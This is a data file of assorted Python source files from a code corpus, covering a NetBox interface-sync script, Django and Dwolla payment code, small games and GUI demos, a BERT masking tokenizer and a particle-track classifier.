+{"seq_id":"18265302","text":"import re\n\nfrom django.http import QueryDict\n\nfrom dcim.api.views import DeviceViewSet\nfrom dcim.choices import InterfaceTypeChoices\nfrom dcim.models import Device, Interface\nfrom extras.scripts import Script, StringVar\n\n\n# TODO: See if this NAPALM call through Netbox can be improved upon without handling NAPALM ourselves\n# or calling the Netbox API via HTTP\ndef napalm_call(method: str, device_id: int, request):\n \"\"\"Function to make NAPALM calls to devices through Netbox internal code\n\n Args:\n method (str): the NAPALM method to call (only supports 'get' methods due to Netbox limitation)\n device_id (int): the id of the device to execute the NAPALM method on\n request: a :obj:`django.http.HttpRequest` or a :obj:`utilities.utils.NetboxFakeRequest` obtained from a script's run method\n\n Returns:\n dict: Returns a dict with the results returned by NAPALM\n \"\"\"\n deviceviewset = DeviceViewSet()\n # Only filter out current device, so we don't prefetch entire database\n deviceviewset.queryset = Device.objects.filter(id=device_id).prefetch_related(\n \"platform\",\n \"primary_ip4__nat_outside\",\n \"primary_ip6__nat_outside\",\n )\n\n request.headers = []\n request.GET = QueryDict(f\"method={method}\")\n response = deviceviewset.napalm(request, device_id)\n return response.data[method]\n\n\nclass InterfaceUpdate(Script):\n \"\"\"Script that can be used to auto generate interfaces from devices using NAPALM\n\n Args:\n Script (:obj:`extras.script.Script`): Netbox Script object that is needed for a class to be recognized as one\n \"\"\"\n\n class Meta:\n \"\"\"Special class that is used for defining script information\"\"\"\n\n name = \"Interface update\"\n description = \"Script that updates interfaces for device names provided\"\n commit_default = False\n\n device_name = StringVar(\n label=\"Devices regex\",\n default=\"(r6|v22)-leaf((1\\d*|[2-9])|1)\",\n description=\"Regex that will be used to select devices to update interfaces\",\n )\n ignore_interfaces = StringVar(\n label=\"Interfaces to ignore regex\",\n default=\"Vlan.*\",\n description=\"Regex that will ignore interfaces matching it (Leave blank to not ignore any)\",\n )\n\n def run(self, data, commit: bool):\n \"\"\"The main method of the script that will be run when pressing the Run Script button\n\n 1. Grabs the data from Netbox about devices containing the devices by regex input by the user\n 2. Loops through the devices, grabs their current Netbox interfaces and then makes a NAPALM call to the device\n 3. Loops through NAPALM interfaces, while ignoring the ones matching the user supplied regex\n 4. If a mac_address is any kind of empty or null, it makes sure to set it to python None\n 5. Using get_or_create, grabs or creates the interface from Netbox while filtering by the specific NAPALM interface the loop is currently on\n 6. Notifies user if a interface was created and if it wasn't checks if the description in Netbox matches NAPALM description\n 7. Updates description if neccessary, notifying user of it.\n\n Args:\n data (dict): a dict that has the variables for user input. Defined using class variables\n commit (bool): a bool that determines to commit or not to commit the changes to database\n (since Netbox automatically reverts database changes on commit = False, we don't use it)\n\n Returns:\n str: output for the Output tab\n \"\"\"\n output = \"\"\n devices = Device.objects.filter(name__regex=data[\"device_name\"])\n\n for device in devices:\n netbox_interfaces = Interface.objects.filter(device=device.id)\n napalm_interfaces = napalm_call(\"get_interfaces\", device.id, self.request)\n\n for napalm_interface in napalm_interfaces:\n # Blacklist interfaces\n if data[\"ignore_interfaces\"] != \"\" and re.match(\n data[\"ignore_interfaces\"], napalm_interface\n ):\n continue\n\n napalm_description = napalm_interfaces[napalm_interface][\"description\"]\n\n mac_address = napalm_interfaces[napalm_interface][\"mac_address\"]\n if (\n mac_address == \"None\"\n and mac_address == \"Unspecified\"\n and mac_address == \"\"\n ):\n mac_address = None\n\n # We don't use update_or_create so we can inform the user when something actually updates\n # update_or_create will update even if nothing changes\n (netbox_interface, created) = netbox_interfaces.get_or_create(\n name=napalm_interface,\n defaults={\n \"type\": InterfaceTypeChoices.TYPE_OTHER,\n \"description\": napalm_description,\n \"device\": device,\n \"mac_address\": mac_address,\n },\n )\n if created:\n self.log_success(\n f\"`[{device.name}]` Created a new interface **({netbox_interface.name})**\"\n )\n else:\n if netbox_interface.description != napalm_description:\n old_description = netbox_interface.description\n netbox_interface.description = napalm_description\n netbox_interface.save()\n self.log_success(\n f\"`[{device.name}]` Updated an interface's description **({netbox_interface.name})**: '{old_description}' -> '{napalm_description}'\"\n )\n\n return output\n","sub_path":"scripts/interface_update.py","file_name":"interface_update.py","file_ext":"py","file_size_in_byte":5836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"561986800","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 27 22:46:36 2014\n\n@author: DiCar\n\"\"\"\n\ndef word_count(phrase):\n dictionary = {}\n \n words = phrase.split()\n for word in words:\n dictionary[word] = words.count(word)\n return dictionary\n \n","sub_path":"all_data/exercism_data/python/word-count/c8060492d1b14c4b9e5a270a8f5ee84f.py","file_name":"c8060492d1b14c4b9e5a270a8f5ee84f.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"87155585","text":"import datetime\nfrom django.utils import timezone\nfrom .models import Reservation\nfrom rest_framework import serializers\n\n\nclass ReservationSerializer(serializers.ModelSerializer):\n team = serializers.SerializerMethodField()\n\n def get_team(self, obj):\n try:\n user = obj.proposer\n except AttributeError:\n user = obj[\"proposer\"]\n return user.get_team_name()\n\n def validate_proposer(self, value):\n user = self.context[\"request\"].user\n if value.position == 1 or user != value:\n raise serializers.ValidationError({\"error\": \"회의실 예약 권한이 없습니다.\"})\n return value\n\n def create(self, validated_data):\n # 회의실 예약은 반드시 미래의 시간에 대해서만 가능하다.\n date = validated_data[\"date\"]\n start_time = validated_data[\"start_time\"]\n hour, minute = divmod(start_time, 2)\n minute *= 30\n d_datetime = timezone.datetime.combine(\n date,\n datetime.time(hour, minute),\n tzinfo=timezone.timezone(timezone.timedelta(hours=9)),\n )\n if d_datetime < timezone.localtime():\n raise serializers.ValidationError(\n {\"error\": f\"{d_datetime}은 예약이 불가능한 시간입니다.\"}\n )\n\n # super().create()에서 reservation을 생성하고 return 한다.\n return super().create(validated_data)\n\n def update(self, request, pk=None):\n pass\n\n class Meta:\n model = Reservation\n fields = (\"id\", \"room\", \"date\", \"start_time\", \"proposer\", \"team\")\n read_only_fields = (\"id\",)\n","sub_path":"conference/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"513479393","text":"#! /usr/local/bin/python3\n\nimport os\n\ndef newline(): print(\"\")\n\ndef main():\n\n\n\tnewline()\n\tprint(\"Welcome to Tic Tac Toe!\")\n\tnewline()\n\tprint(\"Who will play first?\")\n\tplayer_one = input(\"Please type Player 1's name: \")\n\tnewline()\n\tprint(\"Who will play second?\")\n\tplayer_two = input(\"Please type Player 2's name: \")\n\tnewline()\n\tnewline()\n\tnewline()\n\tprint(\"Presenting: \")\n\tnewline()\n\tprint(\"\\t%s v %s\" % (player_one,player_two))\n\n\tour_game = game(player_one,player_two)\n\n\t# our_game = game(\"j\",\"k\")\n\n\tgame.instructions(our_game)\n\n\tnewline()\n\tos.system('read -p \"Press any key to continue.\"')\n\tnewline()\n\n\tturn_count = game.get_turn_count(our_game)\n\n\twhile (turn_count < 16):\n\t\tgame.print_board(our_game)\n\t\tgame.turn(our_game)\n\t\tturn_count = game.get_turn_count(our_game)\n\n\treturn 0\n\nclass game:\n\t\"\"\"An instance of a tic-tac-toe game\"\"\"\n\n\tdef __init__(self,player_one, player_two):\n\t\tself._player_one = player_one\n\t\tself._player_two = player_two\n\t\tself._game_board = [[' ',' ',' ',' '],[' ',' ',' ',' '],[' ',' ',' ',' '],[' ',' ',' ',' ']]\n\t\tself._count = 0\n\t\tself._user_row = 0\n\t\tself._user_col = 0\n\n\tdef instructions(self):\n\n\t\tnewline()\n\t\tprint(\"How to Play:\")\n\t\tprint(\"When prompted, enter your move as \\\"row column\\\".\")\n\t\tprint(\"For Example, to play here:\")\n\n\t\tprint(\"\\t 1 2 3 4 \")\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t1 | | | | |\")\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t1 | | | x | |\")\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t1 | | | | |\")\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t1 | | | | |\")\n\t\tprint(\"\\t +---+---+---+---+\")\n\n\t\tprint(\"Enter: 2 3\");\n\t\tnewline()\n\t\tnewline()\n\n\tdef print_board(self):\n\t\tprint(\"\\t 1 2 3 4 \")\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t1 | %s | %s | %s | %s |\" % (self._game_board[0][0],self._game_board[0][1],self._game_board[0][2],self._game_board[0][3]))\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t2 | %s | %s | %s | %s |\" % (self._game_board[1][0],self._game_board[1][1],self._game_board[1][2],self._game_board[1][3]))\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t3 | %s | %s | %s | %s |\" % (self._game_board[2][0],self._game_board[2][1],self._game_board[2][2],self._game_board[2][3]))\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t4 | %s | %s | %s | %s |\" % (self._game_board[3][0],self._game_board[3][1],self._game_board[3][2],self._game_board[3][3]))\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\treturn\n\n\tdef get_turn_count(self):\n\t\treturn self._count\n\n\tdef turn(self):\n\t\tnewline()\n\t\tnewline()\n\t\tif (self._count % 2 == 0): current_player = self._player_one\n\t\telse: current_player = self._player_two\n\t\tprint(\"Your move, %s\" % current_player)\t\t\n\t\tnewline()\n\t\twhile(True):\n\t\t\traw_input = input(\"%s, please enter your move as \\\"row column\\\": \" % current_player)\n\t\t\tif ((raw_input[0].isdigit() == True) and (int(raw_input[0]) > 0) and (int(raw_input[0])<5)):\n\t\t\t\tself._user_row = int(raw_input[0])-1\n\t\t\telse:\n\t\t\t\tprint(\"Invalid move.\")\n\t\t\tif ((raw_input[2].isdigit() == True) and (int(raw_input[2]) > 0) and (int(raw_input[2])<5)):\n\t\t\t\tself._user_col = int(raw_input[2])-1\n\t\t\telse:\n\t\t\t\tprint(\"Invalid move.\")\n\t\t\tif (self._game_board[self._user_row][self._user_col]==' '):\n\t\t\t\tif(self._count % 2 == 0):\n\t\t\t\t\tself._game_board[self._user_row][self._user_col]=='x'\n\t\t\t\t\tself._count += 1\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tself._game_board[self._user_row][self._user_col]=='o'\n\t\t\t\t\tself._count += 1\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"Invalid move.\")\n\n\n\n\tdef check_for_win(ary, piece, winner, player):\n\t\treturn\n\n\tdef update_board(move):\n\t\treturn\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"advanced_data_structures/py/06-tic-tac-toe.py","file_name":"06-tic-tac-toe.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"40305586","text":"from tkinter import *\r\n\r\nroot = Tk() #Root window application\r\nroot.geometry('600x350')\r\nroot.resizable(0,0)\r\nroot.title('X Y Z Color Controller')\r\n\r\nX = IntVar() # X,Y,Z for RGB and BG string var to change\r\nY = IntVar() # Right Frame's colour\r\nZ = IntVar()\r\nbg = StringVar()\r\n\r\nleftframe = Frame(root,height=350,width=300,bg='#FFFFFF') # Control Frame\r\nleftframe.pack(side=LEFT)\r\n\r\nrightframe = Frame(root,height=350,width=300,bg='#000000') # Color Frame\r\nrightframe.pack(side=RIGHT)\r\n\r\ndef control(event): # Control X and Y Sliders\r\n x = event.x\r\n y = event.y\r\n\r\n X.set(x*1.275)\r\n Y.set(y*1.275)\r\n\r\n show(event)\r\n\r\ndef getHex(var): # Get Hex code in the format\r\n hex_code = var.split('x')[1] # '#RRGGBB'\r\n if len(hex_code) == 1:\r\n return '0' + hex_code\r\n else:\r\n return hex_code\r\n\r\ndef show(event): # This method sets BG\r\n R = getHex(hex(X.get()))\r\n G = getHex(hex(Y.get()))\r\n B = getHex(hex(Z.get()))\r\n bg.set('#' + R + G + B)\r\n rightframe.config(bg=bg.get())\r\n color_label.config(text=bg.get())\r\n\r\n# Rectangular control area\r\nrect = Canvas(leftframe,height=200,width=200,bg='#000000',cursor='circle')\r\nrect.place(x=25,y=25)\r\nrect.bind('',control)\r\nrect.bind('',control)\r\n\r\n# X_Slider\r\nx_slider = Scale(leftframe,orient=HORIZONTAL,showvalue=0,length=200,variable=X,from_=0,to_=255)\r\nx_slider.place(x=25,y=260)\r\nx_slider.bind('',show)\r\nx_slider.bind('',show)\r\n\r\n# Y_Slider\r\ny_slider = Scale(leftframe,orient=VERTICAL,showvalue=0,length=200,variable=Y,from_=0,to_=255)\r\ny_slider.place(x=250,y=25)\r\ny_slider.bind('',show)\r\ny_slider.bind('',show)\r\n\r\n# Z_Slider\r\nz_slider = Scale(leftframe,orient=HORIZONTAL,showvalue=0,length=200,variable=Z,from_=0,to_=255)\r\nz_slider.place(x=25,y=300)\r\nz_slider.bind('',show)\r\nz_slider.bind('',show)\r\n\r\n# Color Hex code\r\ncolor_label = Label(leftframe,font='calibri 20 bold',fg='#000000',bg='#FFFFFF')\r\ncolor_label.place(x=75,y=320)\r\n\r\nroot.mainloop()\r\n","sub_path":"xyzcontroller.py","file_name":"xyzcontroller.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"619034853","text":"\"\"\"\nModule containing function load_windows that loads one of the spreadsheets\n'ARR_VS_ARR, DEP_VS_ARR, ARR_VS_DEP or DEP_VS_DEP'.\n\"\"\"\nimport csv\n\ndef load_windows(filename):\n \"\"\"\n Function that reads spreadsheet filename where the rows have the structure\n train, delayer, delayer, delayer, ...\n And returns spreadsheet as dictionary that has trains as keys\n with list [delayer, delayer, delayer, ...] as values.\n \"\"\"\n csv_reader = csv.reader(open(filename), delimiter=',')\n windows = {}\n\n #Load datastructure to dictionary\n firstrow = True\n for row in csv_reader:\n if firstrow:\n firstrow = False\n else:\n windows[row[0]] = row[1:]\n return windows\n\n","sub_path":"ver4/load_windows.py","file_name":"load_windows.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"453701956","text":"from dwolla import transactions, fundingsources\n\nfrom brambling.payment.core import InvalidAmountException, get_fee\nfrom brambling.payment.dwolla.core import dwolla_prep\n\n\ndef dwolla_get_sources(account, event):\n if account.api_type != event.api_type:\n raise ValueError(\"Account and event API types do not match.\")\n org_account = event.organization.get_dwolla_account(event.api_type)\n if not org_account or not org_account.is_connected():\n raise ValueError(\"Event is not connected to dwolla.\")\n dwolla_prep(account.api_type)\n access_token = account.get_token()\n destination = org_account.user_id\n return fundingsources.get(\n alternate_token=access_token,\n params={\n 'destinationid': destination,\n 'verified': True\n }\n )\n\n\ndef dwolla_charge(account, amount, order, event, pin, source):\n \"\"\"\n Charges to dwolla and returns a charge transaction.\n \"\"\"\n if amount < 0:\n raise InvalidAmountException('Cannot charge an amount less than zero.')\n if account.api_type != event.api_type:\n raise ValueError(\"Account and event API types do not match.\")\n org_account = event.organization.get_dwolla_account(event.api_type)\n if not org_account or not org_account.is_connected():\n raise ValueError(\"Event is not connected to dwolla.\")\n dwolla_prep(account.api_type)\n access_token = account.get_token()\n organization_access_token = org_account.get_token()\n destination = org_account.user_id\n\n user_charge_id = transactions.send(\n destinationid=destination,\n amount=amount,\n alternate_token=access_token,\n alternate_pin=pin,\n params={\n 'facilitatorAmount': float(get_fee(event, amount)),\n 'fundsSource': source,\n 'notes': \"Order {} for {}\".format(order.code, event.name),\n },\n )\n # Charge id returned by send_funds is the transaction ID\n # for the user; the event has a different transaction ID.\n # But we can use this one to get that one.\n\n event_charge = transactions.info(\n tid=str(user_charge_id),\n alternate_token=organization_access_token\n )\n\n return event_charge\n\n\ndef dwolla_refund(order, event, payment_id, amount, pin):\n \"\"\"\n Returns id of refund transaction.\n \"\"\"\n org_account = event.organization.get_dwolla_account(event.api_type)\n dwolla_prep(event.api_type)\n access_token = org_account.get_token()\n return transactions.refund(\n tid=int(payment_id),\n fundingsource=\"Balance\",\n amount=\"%.2f\" % amount,\n alternate_token=access_token,\n alternate_pin=int(pin),\n params={\n 'notes': \"Order {} for {}\".format(order.code, event.name),\n },\n )\n","sub_path":"brambling/payment/dwolla/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"445514318","text":"from typing import Dict\n\nfrom pyconsoleapp import ConsoleAppComponent\nfrom pyconsoleapp import menu_tools, parse_tools\n\nfrom pydiet.recipes import recipe_edit_service as res\nfrom pydiet import configs\n\n_TEMPLATE = '''Recipe Tags:\n------------------------\n{current_tags}\n(s) -- Save Changes\n(d*) -- Delete (where * = number)\n\nAdd Tags:\n{addable_tags}\n\n'''\n\nclass RecipeTagEditorComponent(ConsoleAppComponent):\n def __init__(self, app):\n super().__init__(app)\n self._res = res.RecipeEditService()\n self.set_option_response('s', self.on_save_changes)\n\n @property\n def current_tag_map(self) -> Dict[int, str]:\n return menu_tools.create_number_name_map(\n self._res.recipe.tags)\n\n @property\n def addable_tag_map(self) -> Dict[int, str]:\n # First build a list of all tags minus\n # those already added;\n addable_tags = configs.RECIPE_TAGS.copy()\n for tag in self._res.recipe.tags:\n if tag in addable_tags:\n addable_tags.remove(tag)\n # Turn it into numbered map;\n return menu_tools.create_number_name_map(addable_tags)\n\n def run(self):\n # If there is no recipe loaded;\n if not self._res.recipe:\n # Go back to the main recipe state;\n self.goto('home.recipes')\n\n def print(self):\n # First build the current tag list;\n current_tags = ''\n ## If there are tags assigned;\n if len(self._res.recipe.tags):\n # Grab a numbered list;\n tm = self.current_tag_map\n for key in tm.keys():\n current_tags = current_tags + '{} -- {}\\n'.format(\n key, tm[key])\n ## If there are no tags assigned;\n elif len(self._res.recipe.tags) == 0:\n current_tags = 'No tags assigned.\\n'\n # Build the available tag list;\n addable_tags = ''\n atm = self.addable_tag_map\n for key in atm.keys():\n addable_tags = addable_tags + '(a{}) -- {}\\n'.format(\n key, atm[key])\n # Return the main template;\n output = _TEMPLATE.format(\n current_tags=current_tags,\n addable_tags=addable_tags\n )\n output = self.app.fetch_component('standard_page_component').call_print(output)\n return output\n\n def on_save_changes(self):\n self._res.save_changes()\n\n def dynamic_response(self, raw_response: str) -> None:\n # Cache tag maps;\n atm = self.addable_tag_map\n ctm = self.current_tag_map\n # Try and parse the raw response into a single letter and integer;\n try:\n letter, integer = parse_tools.parse_letter_and_integer(raw_response)\n except parse_tools.LetterIntegerParseError:\n return\n # If we are adding a tag;\n if letter == 'a':\n # If the integer refers to an item on the addable tag list;\n if integer <= len(atm):\n # Add the referenced tag to the recipe;\n self._res.recipe.add_tag(atm[integer])\n # If we are deleting a tag;\n elif letter == 'd':\n # If the integer refers to an item on the current tag list;\n if integer <= len(ctm):\n # Delete the referenced tag from the recipe;\n self._res.recipe.remove_tag(ctm[integer])\n\n \n","sub_path":"pydiet/recipes/cli_components/old_components/recipe_tag_editor_component.py","file_name":"recipe_tag_editor_component.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"545863146","text":"\"\"\"This program changes the background color \nbetween red, green and blue\"\"\"\n\nimport pygame\n\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\nclass Game():\n \"\"\"Is the main game object.\"\"\"\n def __init__(self):\n pygame.init()\n self.color = BLACK\n self.screen = pygame.display.set_mode((640, 240))\n\n def run(self):\n \"\"\"Runs the main event loop.\"\"\"\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_r:\n self.color = pygame.Color('red')\n elif event.key == pygame.K_g:\n self.color = GREEN\n elif event.key == pygame.K_b:\n self.color = BLUE\n\n self.screen.fill(self.color)\n pygame.display.flip()\n\nif __name__ == '__main__':\n Game().run()","sub_path":"docs/tutorial1/intro4.py","file_name":"intro4.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"449916569","text":"class Solution(object):\n def convertToTitle(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n if n<=0:\n return None;\n title=\"\"\n while(n>0):\n n=n-1\n c=chr(n%26+ord('A'))\n n=n/26\n title=title+c;\n return str(''.join(reversed(title)))\n","sub_path":"168. Excel Sheet Column Title.py","file_name":"168. Excel Sheet Column Title.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"647218652","text":"#!/usr/bin/env python\n# coding=utf-8\n# ================================================================\n# Copyright (C) 2019 Tuya NLP. All rights reserved.\n#\n# FileName:test.py\n# Author :rentc(桑榆)\n# DateTime:2021/4/22\n# Desc :\n#\n# ================================================================\n\nimport torch\nimport jieba\nfrom transformers import BertModel, BertConfig\nfrom transformers import BertTokenizer, BertForMaskedLM\nimport pdb\n\nclass MyTokenizer:\n def __init__(self, vocab_path):\n self.tokenizer = BertTokenizer(vocab_path,\n do_lower_case=True,\n do_basic_tokenize=True,\n never_split=None,\n unk_token=\"[UNK]\",\n sep_token=\"[SEP]\",\n pad_token=\"[PAD]\",\n cls_token=\"[CLS]\",\n mask_token=\"[MASK]\",\n tokenize_chinese_chars=False,\n strip_accents=None\n )\n\n def tokenize(self, word_list, p_mask:float, max_length=20, truncation=True, padding=True, islastone=False):\n inputs = self.tokenizer(word_list,\n return_tensors=\"pt\",\n truncation=truncation,\n padding=padding,\n max_length=max_length)\n #pdb.set_trace()\n if p_mask == 0:\n if islastone:\n inputs['input_ids'],labels = self.collate_fn2(inputs['input_ids'])\n else:\n labels = None\n else:\n inputs['input_ids'],labels = self.collate_fn(inputs['input_ids'], p_mask=p_mask)\n return inputs,labels\n # labels = tokenizer(\"The capital of France is Paris.\", return_tensors=\"pt\")[\"input_ids\"]\n \n def collate_fn(self, inputs, p_mask:float = 0.15):\n '''\n collate_fn 函数用来进一步校正数据,安装bert模型的mask原则作出masked的inputs与labels。\n 其中,inputs有15%的几率被mask,而所有的mask中,有80%的几率用'[mask]'进行替代,有10%用随机词进行替代,剩下10%保留原形\n '''\n labels = inputs.clone()\n #pdb.set_trace()\n \n # 特殊码标记,Bert.tokenizer特殊码指 '[UNK]','[CLS]','[PAD]','[SEP]','[MASK]'. 如果这个tag为特殊码,则为1,否则为0\n special_tokens_mask = [self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()] \n special_tokens_mask = torch.tensor(special_tokens_mask,dtype=torch.bool)\n probability_matrix = torch.full(labels.shape, p_mask)\n probability_matrix.masked_fill_(special_tokens_mask, value = 0.) # 特殊码的位置被标记为0,让特殊码一定不会变动\n masked_indices = torch.bernoulli(probability_matrix).bool()\n labels[~masked_indices] = -100\n indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices\n inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)\n indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced\n random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)\n inputs[indices_random] = random_words[indices_random]\n return inputs, labels\n def collate_fn2(self,inputs):\n labels = inputs.clone()\n maskid = [i-1 for val in labels.tolist() for i in range(len(val)) if val[i]==self.tokenizer.sep_token_id]\n for i in range(len(inputs)):\n ind = maskid[i]\n inputs[i][ind] = self.tokenizer.mask_token_id\n for i in range(len(labels)):\n for j in range(len(labels[i])):\n if j != maskid[i]:\n labels[i][j] = -100\n else:\n pass\n return inputs, labels\n \n \n \n \n\nif __name__ == '__main__':\n mt = MyTokenizer(\"../vocab/SougouBertVocab.txt\")\n sen = [' '.join(jieba.lcut('我也一度以为用制片人的钱是应该的')),' '.join(jieba.lcut('她毕业于金日成综合大学'))]\n #sen2 = jieba.lcut('她毕业于金日成综合大学')\n # pdb.set_trace()\n p,l = mt.tokenize(sen,p_mask=0,islastone = True)\n #p2,l2 = mt.tokenizer([' '.join(sen2)])\n print('原句为:', ' '.join(sen), '\\n分词后: ',p['input_ids'], '\\n标签: ',l )\n #print('\\n')\n #print('原句为:', ' '.join(sen2), '\\n分词后: ',p2['input_ids'], '\\n标签: ',l2 )\n #print(p2)\n","sub_path":"tokenizer/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"502257495","text":"# A complete rewrite of the CERN@school particle recognition and classification algorithm,\n# for ease of integration with existing LUCID data and libraries.\n# Can be imported and called from anywhere to identify particle types based on their attributes\n# Author (code): Cal Hewitt, based on an algorithm from http://github.com/cernatschool/cluster-sorter\n\nimport numpy as np\nfrom scipy.optimize import leastsq\nimport json\nimport os\nfrom collections import OrderedDict\n\n# Load up the types file\ntypes = json.JSONDecoder(object_pairs_hook=OrderedDict).decode(open(os.path.dirname(os.path.realpath(__file__)) + \"/types.json\").read())\n# A list of bounds of properties of various particle types, adapted from http://github.com/cernatschool/cluster-sorter\n\n\ndef distance(point1, point2):\n # Simple 2D distance function using Pythagoras:\n # Calculates the distance between point1 (x, y) and point2 (x, y)\n return np.sqrt(((point2[0] - point1[0])**2) + ((point2[1] - point1[1])**2))\n\ndef point_line_distance(point, line):\n # Calculates the shortest distance between a point (x, y) and a line (m, c) where y = mx + c\n x, y = point\n m, c = line\n return np.fabs(m * x - y + c) / np.sqrt(1 + m**2)\n\ndef residuals(line, y, x):\n # Wrapper for point_line_distance in the format required by scipy's regression function\n return point_line_distance((x, y), line)\n\n\n# Stores and calculates the attributes of a single cluster ('blob') of pixels\nclass Blob:\n\n def __init__(self, pixels):\n self.pixels = pixels\n self.num_pixels = len(pixels)\n if not self.num_pixels:\n raise Exception(\"Cannot work on a blank cluster!\")\n # Calculate attributes\n self.radius, self.centroid = self.calculate_radius()\n self.squiggliness, self.best_fit_line = self.calculate_squiggliness()\n self.density = self.calculate_density()\n\n def calculate_radius(self):\n # Firstly, compute the centroid of the blob\n x_vals, y_vals = [], []\n for pixel in self.pixels:\n x_vals.append(pixel[0])\n y_vals.append(pixel[1])\n centroid = (np.mean(x_vals), np.mean(y_vals))\n # Loop through each pixel and check its distance from the centroid; set the radius to the highest of these\n radius = 0.0\n for pixel in self.pixels:\n dist = distance(centroid, pixel)\n if dist > radius:\n radius = dist\n return radius, centroid\n\n def calculate_squiggliness(self):\n # Split up into x and y value lists\n x_vals, y_vals = [], []\n for pixel in self.pixels:\n x_vals.append(pixel[0])\n y_vals.append(pixel[1])\n # Check if the blob is a straight line, so x_vals OR y_vals is made up of only one repeated element\n if x_vals.count(x_vals[0]) == len(x_vals) or y_vals.count(y_vals[0]) == len(y_vals):\n # Return a 0 squiggliness, as the blob is only one pixel, and a horizontal line as a best fit\n return 0, (0, 0)\n # Otherwise, use leastsq to estimate a line of best fit\n # As an initial guess, use a horizontal line passing through the first pixel\n first_guess_line = [0, y_vals[0]] # In the form [gradient, intercept]\n # Use scipy's regression function to magic this into a good LoBF\n best_fit_line = leastsq(residuals, first_guess_line, args = (np.array(y_vals), np.array(x_vals)))[0]\n # Find the mean distance from each pixel to the line (the 'squiggliness')\n distances = [point_line_distance(pixel, best_fit_line) for pixel in self.pixels]\n # Return both a squiggliness value and the parameters of the linear LoBF\n return np.mean(distances), best_fit_line\n\n def calculate_density(self):\n # Calculate the fill by hit pixels of a circle of the blob's radius around the centroid]\n # This can be >1 as the blob's radius passes through the centre of outer pixels rather than around them\n # Firstly, compute the area of the enclosing circle\n circle_area = np.pi*((self.radius)**2)\n if circle_area == 0:\n # If the blob is only one pixel in size, and so has a radius of 0, it is fully dense\n return 1\n else:\n # Divide the number of pixels in the blob by this\n return self.num_pixels / circle_area\n\n def classify(self):\n # Set up a dictionary of the blob's own values\n blob_values = {\"num_pixels\": self.num_pixels,\n \"radius\": self.radius,\n \"density\": self.density,\n \"squiggliness\": self.squiggliness}\n # Loop through each potential particle type, looking for a match\n for particle_name, subtypes in types.iteritems():\n for name, properties in subtypes.iteritems():\n # Initially, presume the particle is a match\n match = True\n # Check through each property, in the form {name: (lower_bound, upper_bound)}\n for property_name, property_value in properties.iteritems():\n # If the blob's properties lie outside the bounds specified in the types file, the blob is not a match\n if (blob_values[property_name] < property_value[0]) or (blob_values[property_name] > property_value[1]):\n match = False\n # If the current particle matches the attributes of the blob, then return its name\n if match:\n return particle_name\n # By this point, all potential particles have been checked, so the blob must be something else\n return \"other\"\n\n\ndef classify(blob):\n # A quick wrapper method for ease of use\n b = Blob(blob)\n return b.classify()\n\ndef classify_multiple(blobs):\n classifications = []\n for blob in blobs:\n classifications.append(classify(blob))\n return classifications\n\ndef classify_masked(blob):\n # Method for early LUCID data where half of pixels are masked:\n b = Blob(blob)\n b.num_pixels *= 2\n b.density *= 2\n return b.classify()\n","sub_path":"classification/old_algorithm/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
